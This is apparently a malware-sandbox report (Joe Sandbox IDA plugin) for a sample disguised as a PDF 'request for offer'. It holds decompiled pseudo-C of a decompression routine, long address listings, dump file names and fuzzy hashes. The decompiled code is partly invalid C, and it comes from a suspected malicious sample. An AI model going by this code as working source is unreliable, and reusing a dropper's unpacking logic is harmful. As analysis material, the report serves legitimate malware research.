							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x0040673b
0x00406742
0x00406748
0x0040674e
0x00000000
0x00406752
0x0040675e
0x0040675e
0x0040675e
0x00406767
0x00000000
0x00000000
0x0040676d
0x00000000
0x00406774
0x00406778
0x00000000
0x00000000
0x00406781
0x00406784
0x00406787
0x00406789
0x0040678b
0x00000000
0x00000000
0x00406791
0x00406794
0x00406796
0x00406797
0x0040679a
0x0040679c
0x0040679d
0x0040679f
0x004067a2
0x004067a7
0x004067ac
0x004067b5
0x004067c8
0x004067cb
0x004067d4
0x004067d7
0x004067ff
0x004067ff
0x00406801
0x0040680f
0x0040680f
0x00406813
0x00000000
0x00000000
0x00000000
0x00000000
0x00406803
0x00406803
0x00406806
0x00406806
0x00406807
0x00406807
0x00000000
0x00406803
0x004067d9
0x004067dd
0x004067e2
0x004067e2
0x004067eb
0x004067f1
0x004067f3
0x004067f6
0x00000000
0x004067fc
0x004067fc
0x00000000
0x004067fc
0x00000000
0x00406819
0x00406819
0x0040681d
0x004070c9
0x00000000
0x004070c9
0x00406826
0x00406836
0x00406839
0x0040683c
0x0040683c
0x0040683c
0x0040683f
0x0040683f
0x00406843
0x00000000
0x00000000
0x00406845
0x00406848
0x0040684b
0x00406875
0x0040687b
0x00406882
0x00000000
0x00406882
0x0040684d
0x00406851
0x00406854
0x00406859
0x00406859
0x00406864
0x0040686a
0x0040686c
0x0040686f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068b4
0x004068ba
0x004068bd
0x004068ca
0x004068d2
0x00000000
0x00000000
0x00406889
0x00406889
0x0040688d
0x004070d8
0x00000000
0x004070d8
0x00406899
0x004068a4
0x004068a4
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b0
0x004068b2
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f49
0x00406f49
0x00406f4f
0x00406f55
0x00406f58
0x00406f5b
0x00406f75
0x00406f78
0x00406f7e
0x00406f89
0x00406f89
0x00406f8b
0x00406f5d
0x00406f5d
0x00406f6c
0x00406f70
0x00406f70
0x00406f8e
0x00406f95
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f97
0x00406f97
0x00406f9b
0x0040714a
0x00000000
0x0040714a
0x00406fa7
0x00406fae
0x00406fb6
0x00406fb6
0x00406fb6
0x00406fb9
0x00406fbc
0x00406fbc
0x00000000
0x00000000
0x004068da
0x004068dc
0x004068df
0x00406950
0x00406953
0x00406956
0x0040695d
0x00406967
0x00000000
0x00406967
0x004068e1
0x004068e5
0x004068e8
0x004068ea
0x004068ed
0x004068f0
0x004068f2
0x004068f5
0x004068f7
0x004068fc
0x004068ff
0x00406902
0x00406906
0x0040690d
0x00406910
0x00406917
0x0040691b
0x00406923
0x00406923
0x00406923
0x0040691d
0x0040691d
0x0040691d
0x00406912
0x00406912
0x00406912
0x00406927
0x0040692a
0x00406948
0x0040694a
0x00000000
0x0040694a
0x0040692c
0x0040692f
0x00406932
0x00406935
0x00406937
0x00406937
0x00406937
0x0040693a
0x0040693d
0x0040693f
0x00406940
0x00406943
0x00000000
0x00000000
0x00406b79
0x00406b7d
0x00406b9b
0x00406b9e
0x00406ba5
0x00406ba8
0x00406bab
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb6
0x00406bbd
0x00406bbe
0x00406bc0
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bc9
0x00406bce
0x00000000
0x00406bce
0x00406b7f
0x00406b82
0x00406b85
0x00406b8f
0x00000000
0x00000000
0x00406be3
0x00406be7
0x00406c0a
0x00406c0d
0x00406c10
0x00406c1a
0x00406be9
0x00406be9
0x00406bec
0x00406bef
0x00406bf2
0x00406bff
0x00406c02
0x00406c02
0x00000000
0x00000000
0x00406c26
0x00406c2a
0x00000000
0x00000000
0x00406c30
0x00406c34
0x00000000
0x00000000
0x00406c3a
0x00406c3c
0x00406c40
0x00406c40
0x00406c43
0x00406c47
0x00000000
0x00000000
0x00406c97
0x00406c9b
0x00406ca2
0x00406ca5
0x00406ca8
0x00406cb2
0x00000000
0x00406cb2
0x00406c9d
0x00000000
0x00000000
0x00406cbe
0x00406cc2
0x00406cc9
0x00406ccc
0x00406ccf
0x00406cc4
0x00406cc4
0x00406cc4
0x00406cd2
0x00406cd5
0x00406cd8
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce1
0x00406ce4
0x00406ceb
0x00406cf0
0x00000000
0x00000000
0x00406d7e
0x00406d7e
0x00406d82
0x00407120
0x00000000
0x00407120
0x00406d88
0x00406d8b
0x00406d8e
0x00406d92
0x00406d95
0x00406d9b
0x00406d9d
0x00406d9d
0x00406d9d
0x00406da0
0x00406da3
0x00000000
0x00000000
0x00406973
0x00406973
0x00406977
0x004070e4
0x00000000
0x004070e4
0x0040697d
0x00406980
0x00406983
0x00406987
0x0040698a
0x00406990
0x00406992
0x00406992
0x00406992
0x00406995
0x00406998
0x00406998
0x0040699b
0x0040699e
0x00000000
0x00000000
0x004069a4
0x004069aa
0x00000000
0x00000000
0x004069b0
0x004069b0
0x004069b4
0x004069b7
0x004069ba
0x004069bd
0x004069c0
0x004069c1
0x004069c4
0x004069c6
0x004069cc
0x004069cf
0x004069d2
0x004069d5
0x004069d8
0x004069db
0x004069de
0x004069fa
0x004069fd
0x00406a00
0x00406a03
0x00406a0a
0x00406a0e
0x00406a10
0x00406a14
0x004069e0
0x004069e0
0x004069e4
0x004069ec
0x004069f1
0x004069f3
0x004069f5
0x004069f5
0x00406a17
0x00406a1e
0x00406a21
0x00000000
0x00406a27
0x00000000
0x00406a27
0x00000000
0x00406a2c
0x00406a2c
0x00406a30
0x004070f0
0x00000000
0x004070f0
0x00406a36
0x00406a39
0x00406a3c
0x00406a40
0x00406a43
0x00406a49
0x00406a4b
0x00406a4b
0x00406a4b
0x00406a4e
0x00406a51
0x00406a51
0x00406a51
0x00406a57
0x00000000
0x00000000
0x00406a59
0x00406a5c
0x00406a5f
0x00406a62
0x00406a65
0x00406a68
0x00406a6b
0x00406a6e
0x00406a71
0x00406a74
0x00406a77
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a9b
0x00406a9f
0x00406aa1
0x00406a79
0x00406a79
0x00406a81
0x00406a86
0x00406a88
0x00406a8a
0x00406a8a
0x00406aa4
0x00406aab
0x00406aae
0x00000000
0x00406ab0
0x00000000
0x00406ab0
0x00406aae
0x00406ab5
0x00406ab5
0x00406ab5
0x00406ab5
0x00000000
0x00000000
0x00406af0
0x00406af0
0x00406af4
0x004070fc
0x00000000
0x004070fc
0x00406afa
0x00406afd
0x00406b00
0x00406b04
0x00406b07
0x00406b0d
0x00406b0f
0x00406b0f
0x00406b0f
0x00406b12
0x00406b15
0x00406b15
0x00406b1b
0x00406ab9
0x00406ab9
0x00406abc
0x00000000
0x00406abc
0x00406b1d
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b29
0x00406b2c
0x00406b2f
0x00406b32
0x00406b35
0x00406b38
0x00406b3b
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5c
0x00406b5f
0x00406b63
0x00406b65
0x00406b3d
0x00406b3d
0x00406b45
0x00406b4a
0x00406b4c
0x00406b4e
0x00406b4e
0x00406b68
0x00406b6f
0x00406b72
0x00000000
0x00406b74
0x00000000
0x00406b74
0x00000000
0x00406e01
0x00406e01
0x00406e05
0x0040712c
0x00000000
0x0040712c
0x00406e0b
0x00406e0e
0x00406e11
0x00406e15
0x00406e18
0x00406e1e
0x00406e20
0x00406e20
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406bd1
0x00406bd1
0x00406bd4
0x00000000
0x00000000
0x00406f10
0x00406f14
0x00406f36
0x00406f39
0x00406f43
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00406f16
0x00406f19
0x00406f1d
0x00406f20
0x00406f20
0x00406f23
0x00000000
0x00000000
0x00406fcd
0x00406fd1
0x00406fef
0x00406fef
0x00406fef
0x00406ff6
0x00406ffd
0x00407004
0x00407004
0x00000000
0x00407004
0x00406fd3
0x00406fd6
0x00406fd9
0x00406fdc
0x00406fe3
0x00406f27
0x00406f27
0x00406f2a
0x00000000
0x00000000
0x004070be
0x004070c1
0x00000000
0x00000000
0x00406cf8
0x00406cfa
0x00406d01
0x00406d02
0x00406d04
0x00406d07
0x00000000
0x00000000
0x00406d0f
0x00406d12
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d1a
0x00406d1d
0x00406d24
0x00406d27
0x00406d35
0x00000000
0x00000000
0x0040700b
0x0040700b
0x0040700e
0x00407015
0x00000000
0x00000000
0x0040701a
0x0040701a
0x0040701e
0x00407156
0x00000000
0x00407156
0x00407024
0x00407027
0x0040702a
0x0040702e
0x00407031
0x00407037
0x00407039
0x00407039
0x00407039
0x0040703c
0x0040703f
0x0040703f
0x0040703f
0x0040703f
0x00407042
0x00407042
0x00407046
0x004070a6
0x004070a9
0x004070ae
0x004070af
0x004070b1
0x004070b3
0x004070b6
0x00406fc2
0x00406fc2
0x00000000
0x00406fc2
0x00407048
0x0040704e
0x00407051
0x00407054
0x00407057
0x0040705a
0x0040705d
0x00407060
0x00407063
0x00407066
0x00407069
0x00407082
0x00407085
0x00407088
0x0040708b
0x0040708f
0x00407091
0x00407091
0x00407092
0x00407095
0x0040706b
0x0040706b
0x00407073
0x00407078
0x0040707a
0x0040707d
0x0040707d
0x00407098
0x0040709f
0x00000000
0x004070a1
0x00000000
0x004070a1
0x00000000
0x00406d3d
0x00406d40
0x00406d76
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea9
0x00406ea9
0x00406eac
0x00406eae
0x00407138
0x00000000
0x00407138
0x00406eb4
0x00406eb7
0x00000000
0x00000000
0x00406ebd
0x00406ec1
0x00406ec4
0x00406ec4
0x00406ec4
0x00000000
0x00406ec4
0x00406d42
0x00406d44
0x00406d46
0x00406d48
0x00406d4b
0x00406d4c
0x00406d4e
0x00406d50
0x00406d53
0x00406d56
0x00406d6c
0x00406d71
0x00406da9
0x00406da9
0x00406dad
0x00406dd9
0x00406ddb
0x00406de2
0x00406de5
0x00406de8
0x00406de8
0x00406ded
0x00406ded
0x00406def
0x00406df2
0x00406df9
0x00406dfc
0x00406e29
0x00406e29
0x00406e2c
0x00406e2f
0x00406ea3
0x00406ea3
0x00406ea3
0x00000000
0x00406ea3
0x00406e31
0x00406e37
0x00406e3a
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e49
0x00406e4c
0x00406e4f
0x00406e52
0x00406e6b
0x00406e6d
0x00406e70
0x00406e71
0x00406e74
0x00406e76
0x00406e79
0x00406e7b
0x00406e7d
0x00406e80
0x00406e82
0x00406e85
0x00406e89
0x00406e8b
0x00406e8b
0x00406e8c
0x00406e8f
0x00406e92
0x00406e54
0x00406e54
0x00406e5c
0x00406e61
0x00406e63
0x00406e66
0x00406e66
0x00406e95
0x00406e9c
0x00406e26
0x00406e26
0x00406e26
0x00406e26
0x00000000
0x00406e9e
0x00000000
0x00406e9e
0x00406e9c
0x00406daf
0x00406db2
0x00406db4
0x00406db7
0x00406dba
0x00406dbd
0x00406dbf
0x00406dc2
0x00406dc5
0x00406dc5
0x00406dc8
0x00406dc8
0x00406dcb
0x00406dd2
0x00406da6
0x00406da6
0x00406da6
0x00406da6
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406d58
0x00406d5b
0x00406d5d
0x00406d60
0x00000000
0x00000000
0x00406abf
0x00406abf
0x00406ac3
0x00407108
0x00000000
0x00407108
0x00406ac9
0x00406acc
0x00406acf
0x00406ad2
0x00406ad5
0x00406ad8
0x00406adb
0x00406add
0x00406ae0
0x00406ae3
0x00406ae6
0x00406ae8
0x00406ae8
0x00406ae8
0x00000000
0x00000000
0x00406c4a
0x00406c4a
0x00406c4e
0x00407114
0x00000000
0x00407114
0x00406c54
0x00406c57
0x00406c5a
0x00406c5d
0x00406c5f
0x00406c5f
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00406c71
0x00406c72
0x00406c74
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00406c7d
0x00406c80
0x00406c80
0x00406c80
0x00406c83
0x00406c85
0x00406c85
0x00000000
0x00000000
0x00406ec7
0x00406ec7
0x00406ec7
0x00406ecb
0x00000000
0x00000000
0x00406ed1
0x00406ed4
0x00406ed7
0x00406eda
0x00406edc
0x00406edc
0x00406edc
0x00406edf
0x00406ee2
0x00406ee5
0x00406ee8
0x00406eeb
0x00406eee
0x00406eef
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00406f00
0x00406f04
0x00406f06
0x00406f09
0x00000000
0x00406f0b
0x00406c88
0x00406c88
0x00000000
0x00406c88
0x00406f09
0x0040713e
0x00407160
0x00407166
0x00407168
0x0040716f
0x00000000
0x00000000
0x0040676d
0x00407175
0x00407175
0x00000000

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf476539507983e16092c80279d888edc01129ecf00556e39cf10d10f419ff7d
Instruction ID: b0390ff044984b209d4cab8587791f90ef454c2be00e5ddb87b3a87963c4087b
Opcode Fuzzy Hash: bf476539507983e16092c80279d888edc01129ecf00556e39cf10d10f419ff7d
Instruction Fuzzy Hash: 83814631D04229DBDB24CFA9C844BAEBBB1FB44305F21816AD856BB2C1C7786986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406B79 Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406B79() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M0040717D))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
